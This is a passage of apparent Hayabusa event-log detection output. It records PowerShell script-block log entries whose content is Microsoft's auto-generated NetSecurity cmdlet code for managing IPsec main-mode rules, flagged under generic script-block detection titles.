'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = 
[Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Copy-NetIPsecMainModeRule' -Alias '*' function Enable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [string[]] ${MainModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not 
$__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 
'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = [Microsoft.PowerShell.Cmdletization.MethodParameter]@{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { 
$__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecMainModeRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecMainModeRule' -Alias '*' function Disable-NetIPsecMainModeRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetMainModeRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [Validate",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:38.215 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEMMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecMainModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetMainModeRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecMainModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = $script:ObjectModelWrapper::new() $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('Name') -and (@('ByName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Name}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('MainModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${MainModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('MainModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { 
$__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetMainModeRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetMainModeRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetMainModeRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecMainModeCryptoSet') -and (@('ByAssociatedNetIPsecMainModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecMainModeCryptoSet}, 'MSFT_NetMainModeRuleMMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if 
($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecMainModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch 